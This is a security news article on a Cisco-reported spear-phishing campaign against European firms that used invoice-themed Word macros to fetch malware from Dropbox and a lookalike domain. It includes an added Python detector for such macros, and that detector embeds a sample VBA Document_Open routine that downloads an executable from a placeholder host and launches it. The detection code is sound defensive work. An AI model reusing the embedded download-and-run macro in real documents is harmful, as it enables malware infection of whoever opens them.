Craig Williams, technical leader of Cisco's Threat Research Analysis and Communications (TRAC) team, delved into attackers' exploits in a Monday blog post. According to Williams, the group lures targets with malicious emails crafted to look like business invoices.
Those who take the bait (spear phishing emails crafted for specific company members) download malware via a malicious Microsoft Word attachment. When opened, the file is rigged to download a malicious executable, Williams wrote. The malware contacts several domains during this process, including Dropbox, a cloud-based file-sharing service, where attackers host malware payloads.
In email correspondence with SCMagazine.com, Williams explained that hackers leveraged a Microsoft programming language, Visual Basic for Applications, to lay their trap.
“This is really an abused feature,” Williams said. “The attacks are using Visual Basic Scripting for Applications to cause an On-Open macro to fire when the victim opens the Word document. This will result in downloading an executable and launching it on the victim's machine. It's quite an old technique,” he added.
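To show how a defender can flag the macro pattern Williams describes (an on-open trigger that downloads and launches an executable), the following Python scans decompressed VBA source for that combination. It is an added example, not code from Cisco's post or the article; the sample macro and its URL are constructed placeholders.

```python
import re

# Procedures Word and Excel run automatically when a document is opened.
AUTO_OPEN_TRIGGERS = re.compile(
    r"\b(AutoOpen|Document_Open|AutoExec|Workbook_Open)\b", re.IGNORECASE)
# Calls commonly used by a macro to fetch a payload from a remote host.
DOWNLOAD_APIS = re.compile(
    r"\b(URLDownloadToFile|MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest|ADODB\.Stream)\b",
    re.IGNORECASE)
# Calls commonly used to launch the fetched payload.
EXEC_APIS = re.compile(
    r"\b(Shell|WScript\.Shell|ShellExecute|CreateProcess)\b", re.IGNORECASE)
URL_PATTERN = re.compile(r"""https?://[^\s"']+""", re.IGNORECASE)

# Constructed sample macro; example.invalid is a placeholder, not a real host.
SAMPLE_MACRO = r'''
Private Sub Document_Open()
    Dim url As String, path As String
    url = "http://example.invalid/invoice.exe"
    path = Environ("TEMP") & "\invoice.exe"
    URLDownloadToFile 0, url, path, 0, 0
    Shell path, vbNormalFocus
End Sub
'''


def analyze_vba(source: str) -> dict:
    """Report auto-exec triggers, download/launch APIs and URLs in VBA source.

    'suspicious' is True only for the article's pattern: an on-open trigger
    in the same module as both a download call and a launch call.
    """
    findings = {
        "auto_open": sorted({m.group(1) for m in AUTO_OPEN_TRIGGERS.finditer(source)}),
        "download": sorted({m.group(1) for m in DOWNLOAD_APIS.finditer(source)}),
        "exec": sorted({m.group(1) for m in EXEC_APIS.finditer(source)}),
        "urls": sorted(set(URL_PATTERN.findall(source))),
    }
    findings["suspicious"] = bool(
        findings["auto_open"] and findings["download"] and findings["exec"])
    return findings


if __name__ == "__main__":
    for key, value in analyze_vba(SAMPLE_MACRO).items():
        print(f"{key}: {value}")
```

The VBA source can be extracted from a document's vbaProject.bin with a tool such as olevba; the scan itself works on the plain text.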
Along with the Dropbox URL, other domains the malware contacted, such as londonpaerl.co.uk (a close match for the legitimate site londonpearl.co.uk), were used to host backdoors, though Cisco blocked the malware from reaching its clients.
According to Williams, Cisco thwarted attacks from the group throughout May and June, though the majority of attacks occurred last month.
The spear phishing campaign has, so far, targeted organizations in Europe, Williams wrote, adding that hackers were likely motivated by “monetary gain.”
Next week, Cisco plans to divulge more information on the group's exploits, specifically the malware used by attackers and their obfuscation techniques, the company blog post said.